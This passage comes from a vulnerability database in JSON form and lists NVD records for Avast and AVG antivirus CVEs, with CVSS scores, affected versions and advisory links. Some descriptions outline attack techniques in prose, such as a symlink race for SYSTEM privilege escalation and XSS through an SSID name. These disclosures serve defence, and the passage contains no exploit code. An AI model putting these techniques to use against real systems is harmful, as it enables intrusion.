5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2024-10-04T13:15:12.803", "references": [ { "source": "security@nortonlifelock.com", "tags": [ "Not Applicable" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "sourceIdentifier": "security@nortonlifelock.com", "vulnStatus": "Analyzed", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-787" } ], "source": "security@nortonlifelock.com", "type": "Secondary" }, { "description": [ { "lang": "en", "value": "CWE-787" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
6.3 (Medium) - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "041E50BD-12AB-47A1-98FF-5A9DAFC82247", "versionEndExcluding": "22.11", "versionStartIncluding": "22.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:avg:anti-virus:*:*:*:*:*:*:*:*", "matchCriteriaId": "E6C5599E-6B91-463D-B715-2962E9E98764", "versionEndExcluding": "22.11", "versionStartIncluding": "22.5", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Avast and AVG Antivirus for Windows were susceptible to a Time-of-check/Time-of-use (TOCTOU) vulnerability in the Quarantine process, leading to arbitrary file/directory deletion. The issue was fixed with Avast and AVG Antivirus version 22.11 and virus definitions from 14 February 2023 or later. " } ], "id": "CVE-2023-1585", "lastModified": "2024-11-21T07:39:29.617", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L", "version": "3.1" }, "exploitabilityScore": 1.0, "impactScore": 5.5, "source": "security@nortonlifelock.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.0, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2023-04-19T19:15:06.630", "references": [ { "source": "security@nortonlifelock.com", "tags": [ "Third Party Advisory" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "sourceIdentifier": "security@nortonlifelock.com", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-367" } ], "source": "security@nortonlifelock.com", "type": "Secondary" }, { "description": [ { "lang": "en", "value": "CWE-367" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "76526B74-4398-42D9-A110-599151A4ABB7", "versionEndExcluding": "20.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to launch the Repair App RPC call from a Low Integrity process." }, { "lang": "es", "value": "Se detect\u00f3 un problema en Avast Antivirus versiones anteriores a 20. El endpoint de aswTask RPC para la biblioteca TaskEx en el Avast Service (AvastSvc.exe) permite a atacantes iniciar la llamada Repair App RPC desde un proceso Low Integrity." } ], "id": "CVE-2020-10868", "lastModified": "2024-11-21T04:56:15.460", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-04-01T18:15:15.567", "references": [ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
5.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:macos:*:*", "matchCriteriaId": "332D750A-C14D-4E7D-8296-99B46A1155A4", "versionEndExcluding": "24092400", "vulnerable": true }, { "criteria": "cpe:2.3:a:avg:antivirus:*:*:*:*:*:macos:*:*", "matchCriteriaId": "D2EB9416-935A-4FF0-AD75-DFCDD6BC1AFF", "versionEndExcluding": "24092400", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An out-of-bounds write in the engine module in AVG/Avast Antivirus signature \u003c24092400 released on 24/Sep/2024 on MacOS allows a malformed eml file to crash the application during file processing." }, { "lang": "es", "value": "Una escritura fuera de los l\u00edmites en el m\u00f3dulo del motor en la firma AVG/Avast Antivirus \u0026lt;24092400 publicada el 24/sep/2024 en MacOS permite que un archivo eml mal formado bloquee la aplicaci\u00f3n durante el procesamiento del archivo." } ], "id": "CVE-2024-9481", "lastModified": "2024-11-08T20:49:03.597", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.4, "impactScore": 3.6, "source": "security@nortonlifelock.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2024-10-04T13:15:12.610", "references": [ { "source": "security@nortonlifelock.com", "tags": [ "Not Applicable" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "sourceIdentifier": "security@nortonlifelock.com", "vulnStatus": "Analyzed", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-787" } ], "source": "security@nortonlifelock.com", "type": "Secondary" }, { "description": [ { "lang": "en", "value": "CWE-787" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
5.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:macos:*:*", "matchCriteriaId": "332D750A-C14D-4E7D-8296-99B46A1155A4", "versionEndExcluding": "24092400", "vulnerable": true }, { "criteria": "cpe:2.3:a:avg:antivirus:*:*:*:*:*:macos:*:*", "matchCriteriaId": "D2EB9416-935A-4FF0-AD75-DFCDD6BC1AFF", "versionEndExcluding": "24092400", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An null-pointer-derefrence in the engine module in AVG/Avast Antivirus signature \u003c24092400 released on 24/Sep/2024 on MacOS allows a malformed xar file to crash the application during file processing." }, { "lang": "es", "value": "Una eliminaci\u00f3n de referencia de puntero nulo en el m\u00f3dulo del motor en la firma AVG/Avast Antivirus \u0026lt;24092400 publicada el 24/sep/2024 en MacOS permite que un archivo xar mal formado bloquee la aplicaci\u00f3n durante el procesamiento del archivo." } ], "id": "CVE-2024-9484", "lastModified": "2024-11-08T20:55:14.283", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.4, "impactScore": 3.6, "source": "security@nortonlifelock.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2024-10-04T13:15:13.167", "references": [ { "source": "security@nortonlifelock.com", "tags": [ "Not Applicable" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "sourceIdentifier": "security@nortonlifelock.com", "vulnStatus": "Analyzed", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-476" } ], "source": "security@nortonlifelock.com", "type": "Secondary" }, { "description": [ { "lang": "en", "value": "CWE-476" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
cve@mitre.org | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232420.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://forum.avast.com/index.php?topic=232423.0 | Release Notes, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | Exploit, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "76526B74-4398-42D9-A110-599151A4ABB7", "versionEndExcluding": "20.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to achieve Local Privilege Escalation (LPE) via RPC." }, { "lang": "es", "value": "Se detect\u00f3 un problema en Avast Antivirus versiones anteriores a 20. El endpoint de aswTask RPC para la biblioteca TaskEx en el Avast Service (AvastSvc.exe) permite a atacantes lograr una Escalada de Privilegios Local (LPE) por medio de una RPC." } ], "id": "CVE-2020-10862", "lastModified": "2024-11-21T04:56:14.550", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-04-01T17:15:15.923", "references": [ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "E14E4791-47A8-4E8C-96E1-1E4A7F2D2F43", "versionEndExcluding": "24.2", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "A sym-linked file accessed via the repair function in Avast Antivirus \u003c24.2 on Windows may allow user to elevate privilege to delete arbitrary files or run processes as NT AUTHORITY\\SYSTEM.\u00a0The vulnerability exists within the \"Repair\" (settings -\u003e troubleshooting -\u003e repair) feature, which attempts to delete a file in the current user\u0027s AppData directory as NT AUTHORITY\\SYSTEM. A\u00a0low-privileged user can make a pseudo-symlink and a junction folder and point to a file on the system. This can provide a low-privileged user an Elevation of Privilege to win a race-condition which will re-create the system files and make Windows callback to a specially-crafted file which could be used to launch a privileged shell instance.\n\nThis issue affects Avast Antivirus prior to 24.2." }, { "lang": "es", "value": "Un archivo con enlace simb\u00f3lico al que se accede a trav\u00e9s de la funci\u00f3n de reparaci\u00f3n en Avast Antivirus \u0026lt;24.2 en Windows puede permitir al usuario elevar privilegios para eliminar archivos arbitrarios o ejecutar procesos como NT AUTHORITY\\SYSTEM. La vulnerabilidad existe dentro de la funci\u00f3n \"Reparaci\u00f3n\" (configuraci\u00f3n -\u0026gt; soluci\u00f3n de problemas -\u0026gt; reparaci\u00f3n), que intenta eliminar un archivo en el directorio AppData del usuario actual como NT AUTHORITY\\SYSTEM. Un usuario con pocos privilegios puede crear un pseudoenlace simb\u00f3lico y una carpeta de uni\u00f3n y apuntar a un archivo en el sistema. Esto puede proporcionar a un usuario con pocos privilegios una elevaci\u00f3n de permisos para ganar una condici\u00f3n de ejecuci\u00f3n que recrear\u00e1 los archivos del sistema y realizar\u00e1 una devoluci\u00f3n de llamada de Windows a un archivo especialmente manipulado que podr\u00eda usarse para iniciar una instancia de shell privilegiada. Este problema afecta a Avast Antivirus antes de la versi\u00f3n 24.2." } ], "id": "CVE-2024-5102", "lastModified": "2024-11-21T09:46:58.337", "metrics": { "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.0, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "attackVector": "LOCAL", "availabilityRequirement": "NOT_DEFINED", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "userInteraction": "ACTIVE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "HIGH", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "security@nortonlifelock.com", "type": "Secondary" } ] }, "published": "2024-06-10T17:16:34.133", "references": [ { "source": "security@nortonlifelock.com", "tags": [ "Not Applicable" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "sourceIdentifier": "security@nortonlifelock.com", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-1284" } ], "source": "security@nortonlifelock.com", "type": "Secondary" }, { "description": [ { "lang": "en", "value": "CWE-59" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:19.3.2369:*:*:*:free:*:*:*", "matchCriteriaId": "9E6447B0-4C67-4D33-AF82-6855C7A1DACD", "vulnerable": true }, { "criteria": "cpe:2.3:a:avast:antivirus:19.3.2369:*:*:*:internet_security:*:*:*", "matchCriteriaId": "41A01B06-7057-40B0-B5E6-444ACE410865", "vulnerable": true }, { "criteria": "cpe:2.3:a:avast:antivirus:19.3.2369:*:*:*:premiere:*:*:*", "matchCriteriaId": "96700855-57C7-4D25-869C-40014D0363C6", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "A Cross Site Scripting (XSS) issue exists in Avast AntiVirus (Free, Internet Security, and Premiere Edition) 19.3.2369 build 19.3.4241.440 in the Network Notification Popup, allowing an attacker to execute JavaScript code via an SSID Name." }, { "lang": "es", "value": "Se presenta un problema de tipo Cross Site Scripting (XSS) en Avast AntiVirus (Free, Internet Security y Premiere Edition) versi\u00f3n 19.3.2369 build 19.3.4241.440, en la ventana emergente de notificaci\u00f3n de red, permitiendo a un atacante ejecutar c\u00f3digo JavaScript por medio de un nombre SSID." } ], "id": "CVE-2019-18653", "lastModified": "2024-11-21T04:33:27.560", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2019-11-01T19:15:11.290", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://firstsight.me/2019/10/5000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop/" }, { "source": "cve@mitre.org", "url": "https://medium.com/%40YoKoKho/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://firstsight.me/2019/10/5000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://medium.com/%40YoKoKho/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-79" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "EAF330ED-7AB1-484F-9DF8-66CD532F0182", "versionEndExcluding": "20.8", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Privilege escalation vulnerability in the Self-Defense driver of Avast Antivirus prior to 20.8 allows a local user with SYSTEM privileges to gain elevated privileges by \"hollowing\" process wsc_proxy.exe which could lead to acquire antimalware (AM-PPL) protection." }, { "lang": "es", "value": "Una vulnerabilidad de escalada de privilegios en el controlador de Autodefensa de Avast Antivirus versiones anteriores a 20.8, permite a un usuario local con privilegios SYSTEM alcanzar privilegios elevados al \"vaciar\" el proceso wsc_proxy.exe, que podr\u00eda conllevar a una adquisici\u00f3n de protecci\u00f3n antimalware (AM-PPL)" } ], "id": "CVE-2021-45337", "lastModified": "2024-11-21T06:32:06.460", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.0, "impactScore": 6.0, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2021-12-27T14:15:07.993", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party 